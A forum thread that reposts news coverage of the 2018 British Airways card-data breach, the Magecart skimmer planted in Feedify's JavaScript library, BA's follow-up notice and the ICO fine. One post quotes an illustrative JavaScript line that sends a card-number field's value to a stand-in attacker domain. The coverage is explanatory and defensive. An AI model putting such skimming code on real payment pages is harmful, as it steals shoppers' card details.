Jump to content

Recommended Posts

Posted

British Airways was in talks with IBM on outsourcing security just before hack

 

Just weeks before being hacked in late August, British Airways' parent IAG was planning to outsource its cybersecurity to IBM, admitting it needed a "group-wide strategic and proactive approach" to counter threats.

 

The Register has learned, from a leaked internal memo, that BA was consulting its staffers about the move. According to the missive, the airline expected to transfer the majority of its cybersecurity functions to IBM with the exception of its security operations services, which will remain part of its own function.

 

An infosec expert with experience in the aviation industry told El Reg: "You don't outsource something that is working well." The airline may have proposing outsourcing either because it is "struggling to get enough high-quality staff or because the board wanted to cut costs," we were told.

 

BA has a bad reputation of cost-cutting at the moment, he added.

 

In any case, British Airways, at the start of August, felt it needed outside help to secure its computer systems.

Posted

This one is interesting - sounds like they intercepted the actual transactions as they got the 3 digit security number on the back as well as everything else

 

Theoretically this should never be stored so it has to be captured in transit - unless BA have been breaking rules??

Posted
This one is interesting - sounds like they intercepted the actual transactions as they got the 3 digit security number on the back as well as everything else

 

Theoretically this should never be stored so it has to be captured in transit - unless BA have been breaking rules??

 

If that is the case then it will make for some interesting headlines in the future, but there could be a myriad of reasons including an inside job for example. We shall just have to wait and see.

Posted
Why are any websites except visa and mastercard processing card data? Those 2 should just offer the service for free to businesses, would save them money and stop everyone thinking they suck as much as they do
Posted (edited)
Why are any websites except visa and mastercard processing card data?

Also, why are companies still embedding third-party JavaScript on their payment pages? At the very least they could use subresource integrity to prevent browsers running compromised scripts (and appropriate CSPs for 3rd-party iframes). :confused:

 

wY2zcc.jpg

 

WGBg5d.png

 

GqTuNb.jpg

Edited by Arthur
Posted
This is the same outfit that wanted people to tweet personal details if they raised queries.

It may have been this that started a chain of unfortunate events that led to the breach...

 

www.edugeek.net/forums/data-protection-information-handling/198342-british-airways-asked-customers-post-personal-info-twitter-comply-w-gdpr.html#post1701745

 

KfzBOc.png

 

BA site breach through XSS flaw, says tech firm chief

 

The British Airways website breach appears to have been done through a cross-site scripting flaw, according to the chief executive of a Web automation company in the UK.

 

Marcus Greenwood, who heads UBIO, said an analysis of the payment page of the airline showed that files were being loaded from seven external domains.

 

"These include files from analytics, customer service and A/B testing tools. These should not be present on Web pages processing customer card data," he wrote.

 

British Airways disclosed that the financial and personal details of 380,000 customers had been stolen from its site 21 August and 5 September.

 

Well-known security researcher Mustafa Al-Bassam said earlier on Saturday that British Airways had changed the third-party JavaScript code it loads on its website as a result of a privacy complaint he had made.

 

Greenwood pointed out that there was no

 

"This is bad because it is trivial for any JavaScript file loaded to steal the card details and post to another 3rd party domain. This is called XSS," he added, posting code to illustrate what he was saying:

 

document.querySelector(‘#CardNumber1’).addEventListener(‘change’, (e) => { fetch(‘https://evilhacker.lol/card-details.php’, { method: ‘post’, body: e.target.value });

 

Greenwood said: "If the card details were collected in a third party domain

 

"Given customer details were only stolen from users on the site between 21 August and 5 September, it’s likely that the hack was an XSS exploit rather than a database hack or similar."

Posted

Card-stealing code that pwned British Airways, Ticketmaster pops up on more sites via hacked JS

 

A Javascript library hosted by Feedify and used by e-commerce websites globally has been repeatedly infected this week to potentially siphon off countless victims' bank card details to crooks.

 

The library code is typically embedded into retail webpages by site administrators and developers to add a means for shoppers to leave customer feedback. That code – feedbackembad-min-1.0.js – is served from Feedify's web servers, and has been repeatedly tampered with by hackers to include the MageCart malware. This malicious software seeks out credit card details entered on the compromised webpages, and phones them home to an outside server controlled by fraudsters.

 

Thus, if someone visits a website that includes Feedify's vandalized code, their browser will pull in the MageCart malware from Feedify's servers as well as the feedback form, and this will then snoop on and siphon off any sensitive information, such as payment card data, typed in and submitted.

 

Therefore, any number of netizens using one of the e-commerce and hotel websites relying on Feedify's code were potentially at risk of having their information swiped and used by fraudsters to go on spending sprees with their banking accounts. Feedify claims 4,000-plus websites use its code; a quick search showed at least a few hundred using this particular feedback library.

 

And that, by the way, is the same MageCart script that also, it is understood, appeared on the British Airways and Ticketmaster websites, leading to the theft of people's payment card data while booking tickets.

 

The malware was detected on Feedify's systems at 5pm UTC today, although has since vanished from its web servers. It was programmed to send the card data to another compromised website: info-stat[.]ws.

 

This is the third time, we're told, that MageCart has appeared and been scrubbed from Feedify's various machines in recent days. This suggests this is an ongoing attack that's left the biz playing whack-a-mole with hackers breaking into its networks, and staff deleting vandalized libraries.

 

Shut it down

Essentially, this is a textbook demonstration of why sensitive pages on websites – particular payment pages – should not carry any third-party code. If the JavaScript or other elements are hosted by an external source, and that source is pwned, and there is no way to detect that, it's game over for everyone. And if the source is supplying scripts to thousands of websites, it becomes a very valuable target: hacking it will compromise many, many online stores in one fell swoop.

  • 1 month later...
Posted

Update on British Airways cyber attack - Thursday 25 October 2018

 

Since our announcement on 6 September 2018 regarding the theft of our customers’ data, British Airways has been working continuously with specialist cyber forensic investigators and the National Crime Agency to investigate fully the data theft. We are updating customers today with further information as we conclude our internal investigation.

 

The investigation has shown the hackers may have stolen additional personal data and we are notifying the holders of 77,000 payment cards, not previously notified, that the name, billing address, email address, card payment information, including card number, expiry date and CVV have potentially been compromised, and a further 108,000 without CVV. The potentially impacted customers were those only making reward bookings between 21 April and 28 July 2018, and who used a payment card.

 

While we do not have conclusive evidence that the data was removed from British Airways’ systems, we are taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution. Customers who are not contacted by British Airways by Friday 26 October at 1700 GMT do not need to take any action.

 

In addition, from the investigation we know that fewer of the customers we originally announced were impacted. Of the 380,000 payment card details announced, 244,000 were affected. Crucially, we have had no verified cases of fraud.

 

We are very sorry that this criminal activity has occurred. As we have been doing, we will reimburse any customers who have suffered financial losses as a direct result of the data theft and we will be offering credit rating monitoring, provided by specialists in the field, to any affected customer who is concerned about an impact to their credit rating.

  • 8 months later...
Posted (edited)

BA faces record £183m fine over data breach

 

British Airways is set to be fined more than £183m by the Information Commissioner’s Office over a customer data breach, the company said.

 

The British Airways chairman, Álex Cruz, said the airline was “disappointed” by the initial finding.

 

He said: “British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused.”

 

Related thread: www.edugeek.net/showthread.php?t=208166

Edited by Arthur

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now



×
×
  • Create New...